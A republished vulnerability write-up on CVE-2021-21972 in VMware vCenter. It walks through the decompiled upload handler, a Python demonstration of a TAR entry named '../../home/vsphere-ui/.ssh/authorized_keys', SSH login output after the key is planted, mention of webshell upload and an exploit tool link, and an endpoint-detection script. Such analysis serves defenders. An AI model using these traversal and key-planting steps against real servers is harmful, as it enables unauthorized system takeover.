How to analyze the vCenter 6.5/7.0 RCE vulnerability CVE-2021-21972

2025-01-19 Update From: SLTechnology News&Howtos > Network Security

Shulou (Shulou.com) 05/31 Report

This article walks through the analysis of the vCenter 6.5/7.0 RCE vulnerability CVE-2021-21972 and its fix, in the hope of giving readers who need to deal with this problem a simple and practical approach.

0x01. Vulnerability overview

vCenter Server is the management center for ESXi: it manages all vSphere hosts and virtual machines in the data center from a single control point.

CVE-2021-21972 is an unauthenticated arbitrary file upload vulnerability in vCenter. Through it, files can be written to any location on the vCenter server. Because the service runs with System permission, files can be written anywhere, so a webshell can be uploaded and executed. If the environment is Linux and SSH is open, a public key can be uploaded and used to log in directly over SSH.

0x02. Vulnerability analysis

The API of vCenter Server's vROPS plug-in is written with Spring. Some sensitive endpoints are not authenticated, and the uploadova endpoint exposes a function for uploading OVA files:

```java
@RequestMapping(value = {"/uploadova"}, method = {RequestMethod.POST})
public void uploadOvaFile(@RequestParam(value = "uploadFile", required = true) CommonsMultipartFile uploadFile,
                          HttpServletResponse response) throws Exception {
    logger.info("Entering uploadOvaFile api");
    int code = uploadFile.isEmpty() ? 400 : 200;
    PrintWriter wr = null;
    ...
    response.setStatus(code);
    String returnStatus = "SUCCESS";
    if (!uploadFile.isEmpty()) {
        try {
            logger.info("Downloading OVA file has been started");
            logger.info("Size of the file received:" + uploadFile.getSize());
            InputStream inputStream = uploadFile.getInputStream();
            File dir = new File("/tmp/unicorn_ova_dir");
            if (!dir.exists()) {
                dir.mkdirs();
            } else {
                // Empty the extraction directory before unpacking the new archive
                String[] entries = dir.list();
                String[] var9 = entries;
                int var10 = entries.length;
                for (int var11 = 0; var11 < var10; ++var11) {
                    String entry = var9[var11];
                    File currentFile = new File(dir.getPath(), entry);
                    currentFile.delete();
                }
                logger.info("Successfully cleaned: /tmp/unicorn_ova_dir");
            }
            TarArchiveInputStream in = new TarArchiveInputStream(inputStream);
            TarArchiveEntry entry = in.getNextTarEntry();
            ArrayList result = new ArrayList();
            while (entry != null) {
                if (entry.isDirectory()) {
                    entry = in.getNextTarEntry();
                } else {
                    // The entry name taken from the archive is joined to the base directory without any check
                    File curfile = new File("/tmp/unicorn_ova_dir", entry.getName());
                    File parent = curfile.getParentFile();
                    if (!parent.exists()) {
                        parent.mkdirs();
                    }
                    // ... the decompiled fragment shown on the page ends here
                }
            }
        } catch (Exception e) {
            ...
        }
    }
}
```

The handler extracts the uploaded TAR archive into the /tmp/unicorn_ova_dir directory, and it builds each output path by concatenating /tmp/unicorn_ova_dir with the entry name taken straight from the archive before writing the file.

So an entry whose name contains ../ escapes the intended directory, and the file can be written to any location.
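The path-construction bug and its fix, as an added example that is not code from the page or from VMware: it builds a constructed in-memory TAR (a stand-in for an OVA, not a real one) with one benign entry and one traversal entry, shows the path the unchecked join produces, and checks each entry against the rule a hardened extractor would apply, namely that the resolved path must stay inside /tmp/unicorn_ova_dir. The archive is never extracted to disk.

```python
import io
import os
import tarfile

# Extraction directory used by the vulnerable uploadOvaFile handler
BASE_DIR = "/tmp/unicorn_ova_dir"


def build_sample_ova() -> bytes:
    """Constructed sample archive: one normal entry and one with a climbing name."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in [
            ("disk1.vmdk", b"benign sample payload"),
            ("../../home/vsphere-ui/.ssh/authorized_keys", b"constructed-key-material"),
        ]:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def vulnerable_target(entry_name: str, base_dir: str = BASE_DIR) -> str:
    """Mirror of new File(base, entry.getName()): join and normalise, no containment check."""
    return os.path.normpath(os.path.join(base_dir, entry_name))


def is_safe_entry(entry_name: str, base_dir: str = BASE_DIR) -> bool:
    """Hardened rule: the fully resolved target must remain under base_dir.
    Absolute names are rejected too, because os.path.join discards base_dir for them."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, entry_name))
    return os.path.commonpath([base, target]) == base


def classify_entries(tar_bytes: bytes) -> dict:
    """Map every regular-file entry name to the path the unchecked join would write
    and whether the hardened check would accept it."""
    report = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar.getmembers():
            if member.isdir():
                continue
            report[member.name] = {
                "unchecked_target": vulnerable_target(member.name),
                "safe": is_safe_entry(member.name),
            }
    return report
```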

In general, a JSP webshell is written to the target server (the service has System permission, so any file can be written), for example with the tool https://github.com/NS-Sp4ce/CVE-2021-21972.

If the environment is Linux and SSH is open, a tar archive containing the entry ../../home/vsphere-ui/.ssh/authorized_keys can be created and uploaded, after which login over SSH is possible:

```
$ ssh 10.211.55.4 -l vsphere-ui
VMware vCenter Server 7.0.1.00100
Type: vCenter Server with an embedded Platform Services Controller
vsphere-ui@bogon [ ~ ]$ id
uid=1016(vsphere-ui) gid=100(users) groups=100(users),59001(cis)
```

0x03. Detection script (Python)

```python
# coding: utf-8
from urllib.parse import urljoin
from pocsuite3.api import POCBase, Output, register_poc, logger, requests


class DemoPOC(POCBase):
    vulID = ''
    version = '1.0'
    author = ['']
    vulDate = '2021-02-24'
    createDate = '2021-02-24'
    updateDate = '2021-02-24'
    references = ['']
    name = 'VMware vCenter unauthorized RCE vulnerability'
    appPowerLink = ''
    appName = 'VMware vCenter'
    appVersion = '7.0 before U1c, version 6.7 before 6.7U3l, version 6.5 prior to U3n'
    vulType = ''
    desc = '''VMware vCenter unauthorized RCE vulnerability'''
    samples = ['']
    install_requires = ['']

    def _verify(self):
        result = {}
        try:
            vul_url = urljoin(self.url, "/ui/vropspluginui/rest/services/uploadova")
            resp1 = requests.get(self.url)
            resp2 = requests.get(vul_url)
            # The landing page identifies vCenter, and the unauthenticated plug-in
            # endpoint answers a GET with 405 (it only accepts POST) when it is exposed
            if '/vsphere-client' in resp1.text and resp2.status_code == 405:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
        except Exception as e:
            logger.error(e)
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register_poc(DemoPOC)
```

0x04. Fix

VMware's fix is relatively simple: disable the vROPS plug-in.

This concludes the analysis of the vCenter 6.5/7.0 RCE vulnerability CVE-2021-21972. I hope the above content is of some help to you. If you still have questions, you can follow the industry information channel for more related knowledge.
